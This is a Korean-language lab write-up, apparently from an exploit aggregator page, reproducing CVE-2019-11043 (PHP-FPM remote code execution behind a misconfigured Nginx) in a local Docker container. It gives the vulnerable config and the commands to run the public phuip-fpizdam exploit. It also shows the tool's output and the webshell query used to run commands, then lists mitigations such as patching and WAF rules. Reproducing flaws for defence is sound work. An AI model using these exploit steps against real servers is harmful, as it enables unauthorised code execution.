Share
## https://sploitus.com/exploit?id=4B409F5B-3A80-5B77-9CAD-7BAAFFAFB740
# CVE-2019-11043

# **PHP-FPM Remote Code Execution (CVE-2019-11043)**

---

### **Contributors**

- ์ •ํ˜„๊ต

### ์š”์•ฝ

---

PHP-FPM์€ PHP๋ฅผ ์œ„ํ•œ FastCGI ๊ตฌํ˜„์ฒด์ž…๋‹ˆ๋‹ค. PHP ๋ฒ„์ „ 7.1.x์˜ 7.1.33 ๋ฏธ๋งŒ, 7.2.x์˜ 7.2.24 ๋ฏธ๋งŒ, 7.3.x์˜ 7.3.11 ๋ฏธ๋งŒ ๋ฒ„์ „์—์„œ, ํŠน์ • FPM ์„ค์ • ์กฐ๊ฑดํ•˜์— FPM ๋ชจ๋“ˆ์ด ํ• ๋‹น๋œ ๋ฒ„ํผ๋ฅผ ๋„˜์–ด์„œ(overflow) FCGI ํ”„๋กœํ† ์ฝœ ๋ฐ์ดํ„ฐ์šฉ์œผ๋กœ ์˜ˆ์•ฝ๋œ ๊ณต๊ฐ„์— ์“ฐ๊ธฐ๋ฅผ ํ•˜๋„๋ก ์œ ๋ฐœํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋กœ ์ธํ•ด ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰(RCE)์ด ๊ฐ€๋Šฅํ•ด์ง‘๋‹ˆ๋‹ค.

์ด ์ทจ์•ฝ์ ์€ Chaitin Tech๊ฐ€ ์ฃผ์ตœํ•œ Real World CTF 2019 ์˜ˆ์„ (Quals) ์ค‘์— ์ฒ˜์Œ ๋ฐœ๊ฒฌ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์ด ์ทจ์•ฝ์ ์€ PHP-FPM๊ณผ ํ•จ๊ป˜ ๋™์ž‘ํ•˜๋Š” Nginx ์„œ๋ฒ„๊ฐ€ ํŠน์ • ๋ฐฉ์‹์œผ๋กœ ์ž˜๋ชป ์„ค์ •(misconfiguration)๋˜์–ด ์žˆ์„ ๋•Œ ์˜ํ–ฅ์„ ๋ฐ›์œผ๋ฉฐ, ๊ฐ€์žฅ ํ”ํ•œ ์ทจ์•ฝ ์„ค์ •์œผ๋กœ๋Š” `location ~ [^/]\.php(/|$)` ๊ทœ์น™์ด ์žˆ์Šต๋‹ˆ๋‹ค.

### ์ทจ์•ฝ ์กฐ๊ฑด

---

PHP ๋ฒ„์ „ 7.1.x์˜ 7.1.33 ๋ฏธ๋งŒ, 7.2.x์˜ 7.2.24 ๋ฏธ๋งŒ, 7.3.x์˜ 7.3.11 ๋ฏธ๋งŒ ๋ฒ„์ „์—์„œ ์ผ์–ด๋‚˜๋Š” ์ทจ์•ฝ์ ์œผ๋กœ FPM ๋ชจ๋“ˆ ์ž์ฒด์˜ ๋ฉ”๋ชจ๋ฆฌ ์ฒ˜๋ฆฌ ๋ฒ„๊ทธ์ž…๋‹ˆ๋‹ค. ์ด ๋ฒ„์ „๋Œ€๋ผ๋ฉด ์„ค์ •๊ณผ ๋ฌด๊ด€ํ•˜๊ฒŒ ๊ทผ๋ณธ์ ์œผ๋กœ ๊ฒฐํ•จ์ด ์žˆ์Šต๋‹ˆ๋‹ค.

```html
location ~ [^/]\.php(/|$) {
    ...
    fastcgi_split_path_info ^(.+?\.php)(/.*)$;
    fastcgi_param PATH_INFO $fastcgi_path_info;
    fastcgi_pass php:9000;
}
```

Nginx์˜ ์œ„ํ—˜ํ•œ location ์ •๊ทœ์‹์œผ๋กœ ์ธํ•ด

- `[^/]\.php` ํŒจํ„ด์ด `.php`๋กœ ๋๋‚˜๊ธฐ๋งŒ ํ•˜๋ฉด ๋’ค์— ๋ญ๊ฐ€ ๋ถ™๋“ (`/์•„๋ฌด๊ฑฐ๋‚˜`) ๋‹ค PHP-FPM์œผ๋กœ ๋„˜๊ฒจ๋ฒ„๋ฆฝ๋‹ˆ๋‹ค
- `fastcgi_split_path_info`๊ฐ€ URL์„ ์ชผ๊ฐœ์„œ `PATH_INFO`๋กœ ๋„˜๊ธฐ๋Š” ๊ณผ์ •์—์„œ, ์š”์ฒญ์— ๊ฐœํ–‰๋ฌธ์ž(`\n`, URL ์ธ์ฝ”๋”ฉ์œผ๋กœ `%0A`)๊ฐ€ ์„ž์ด๋ฉด ํŒŒ์‹ฑ์ด ๊นจ์ง€๊ฒŒ ๋ฉ๋‹ˆ๋‹ค

๋˜ํ•œ ํŒŒ์ผ ์กด์žฌ ์—ฌ๋ถ€๋ฅผ ์ฒดํฌํ•˜์ง€ ์•Š์•„, `/index.php\n์•…์˜์ ์ธ๋ฌธ์ž์—ด` ๊ฐ™์€ ์š”์ฒญ์„ ๋„˜๊ฒจ๋ฒ„๋ฆฝ๋‹ˆ๋‹ค.

### ํ™˜๊ฒฝ ๊ตฌ์„ฑ

---

์œˆ๋„์šฐ 11 Pro ๋ฒ„์ „์—์„œ์˜ Docker์—์„œ ์žฌ๊ตฌํ˜„๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ๊ธฐ๋ณธ์ ์œผ๋กœ Docker๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” Hyper-V ๊ฐ€ ์‚ฌ์šฉ๋˜๊ณ  ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

๋ชจ๋“  ๋ช…๋ น์–ด๋Š” CMD(๋ช…๋ น ํ”„๋กฌํ”„ํŠธ) ๊ด€๋ฆฌ์ž ๊ถŒํ•œ ์—†์ด ์‹คํ–‰๋˜์—ˆ์Šต๋‹ˆ๋‹ค.

---

๋‹ค์Œ ๋ช…๋ น์„ ์‚ฌ์šฉํ•˜์—ฌ Nginx์—์„œ ์ทจ์•ฝํ•œ PHP-FPM 7.2.10 ์„œ๋ฒ„๋ฅผ ๊ตฌ๋™ํ•ฉ๋‹ˆ๋‹ค.

```powershell
docker compose up -d
```

์„œ๋ฒ„ ๊ตฌ๋™ ์ดํ›„, `http://localhost:8080/index.php` ๋ฅผ ํ†ตํ•ด ๊ธฐ๋ณธ ํŽ˜์ด์ง€์— ์ ‘์† ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. 

![image.png](image.png)

### ์ทจ์•ฝ์  ์žฌํ˜„

---

๋‹ค์Œ ๋ช…๋ น์–ด๋ฅผ ํ†ตํ•ด, ์ต์Šคํ”Œ๋กœ์ž‡ ๋„๊ตฌ๋ฅผ ์‹คํ–‰ํ•˜์—ฌ ๊ตฌ๋™๋œ ์„œ๋ฒ„์— ์ทจ์•ฝ์ ์„ ์žฌํ˜„ํ•ฉ๋‹ˆ๋‹ค.

```powershell
./phuip-fpizdam http://localhost:8080/index.php
```

์ต์Šคํ”Œ๋กœ์ž‡ ๋„๊ตฌ๋Š” [https://github.com/neex/phuip-fpizdam](https://github.com/neex/phuip-fpizdam) ์—์„œ ๋ฐ›์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

```powershell
.\phuip-fpizdam.exe http://localhost:8080/index.php
2026/07/09 16:58:55 Base status code is 200
2026/07/09 16:58:56 Status code 502 for qsl=1800, adding as a candidate
2026/07/09 16:58:56 The target is probably vulnerable. Possible QSLs: [1790 1795 1800]
2026/07/09 16:58:57 Attack params found: --qsl 1795 --pisos 248 --skip-detect
2026/07/09 16:58:57 Trying to set "session.auto_start=0"...
2026/07/09 16:58:57 Detect() returned attack params: --qsl 1795 --pisos 248 --skip-detect <-- REMEMBER THIS
2026/07/09 16:58:57 Performing attack using php.ini settings...
2026/07/09 16:58:57 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2026/07/09 16:58:57 Trying to cleanup /tmp/a...
2026/07/09 16:58:57 Done!
```

์„ฑ๊ณต์ ์œผ๋กœ ์ต์Šคํ”Œ๋กœ์ž‡์ด ์„ฑ๊ณตํ•˜๊ฒŒ ๋˜๋ฉด ์ด์™€ ๊ฐ™์ด ์ถœ๋ ฅ๋ฉ๋‹ˆ๋‹ค.

![image.png](image%201.png)

์ดˆ๊ธฐ ์ต์Šคํ”Œ๋กœ์ž‡ ํ›„ WebShell ์ด PHP-FPM ํ”„๋กœ์„ธ์Šค์— ์ฃผ์ž…๋ฉ๋‹ˆ๋‹ค. ๋‹ค์Œ ์ฃผ์†Œ์— ์ ‘์†ํ•˜์—ฌ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

```powershell
http://localhost:8080/index.php?a=id
```

์„ฑ๊ณต์ ์œผ๋กœ ์ถœ๋ ฅ๋œ๊ฒƒ์„ ํ™•์ธ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

![image.png](image%202.png)

### ์ค‘์š” ์ฐธ๊ณ  ์‚ฌํ•ญ

---

์ด ์ทจ์•ฝ์ ์€ ์ผ๋ถ€ PHP-FPM ํ•˜์œ„ ํ”„๋กœ์„ธ์Šค์—๋งŒ ์˜ํ–ฅ์„ ๋ฏธ์นฉ๋‹ˆ๋‹ค. ๋ช…๋ น์ด ์ฒซ ๋ฒˆ์งธ ์‹œ๋„์—์„œ ์‹คํ–‰๋˜์ง€ ์•Š์œผ๋ฉด ์˜ํ–ฅ์„ ๋ฐ›๋Š” ํ”„๋กœ์„ธ์Šค์— ๋„๋‹ฌํ•˜๊ธฐ ์œ„ํ•ด ์—ฌ๋Ÿฌ ๋ฒˆ ์‹œ๋„ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ํ˜น์€ ์ƒˆ๋กœ๊ณ ์นจ์„ ํ•ด๋ณด์…”๋„ ๋ฉ๋‹ˆ๋‹ค.

์ต์Šคํ”Œ๋กœ์ž‡์˜ ์„ฑ๊ณต ์—ฌ๋ถ€๋Š” ํŠน์ • Nginx ๊ตฌ์„ฑ์— ํฌ๊ฒŒ ์ขŒ์šฐ๋ฉ๋‹ˆ๋‹ค. ๊ฐ€์žฅ ์ผ๋ฐ˜์ ์ธ ์ทจ์•ฝํ•œ ๊ตฌ์„ฑ์€ ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค :

- FastCGI ์ฒ˜๋ฆฌ ํ™œ์„ฑํ™”
- PHP-FPM์„ ํ†ตํ•ด ์ฒ˜๋ฆฌ๋œ PHP ํŒŒ์ผ
- URL์„ ์ทจ์•ฝํ•œ ๋ฐฉ์‹์œผ๋กœ ๋ถ„ํ• ํ•˜๋Š” ํŠน์ • ์œ„์น˜ ๊ทœ์น™

### ๋Œ€์‘ ๋ฐฉ์•ˆ

---

- PHP ๋ฒ„์ „ ์—…๊ทธ๋ ˆ์ด๋“œ
- Nginx ์„ค์ •์— ํŒŒ์ผ ์กด์žฌ ์ฒดํฌ ์ถ”๊ฐ€
- WAF (Web Application Firewall) ๋ฃฐ ์ ์šฉ
    - URL์— ๊ฐœํ–‰ ๋ฌธ์ž(`%0A`, `\n`)๊ฐ€ ํฌํ•จ๋œ ์š”์ฒญ ์ž์ฒด๋ฅผ ์ฐจ๋‹จ
    - ๋น„์ •์ƒ์ ์œผ๋กœ ๊ธด ์ฟผ๋ฆฌ์ŠคํŠธ๋ง(๊ณต๊ฒฉ ํŠน์„ฑ์ƒ 1500~2000๋ฐ”์ดํŠธ๋Œ€ padding ํ•„์š”) ํƒ์ง€ ๋ฃฐ ์ถ”๊ฐ€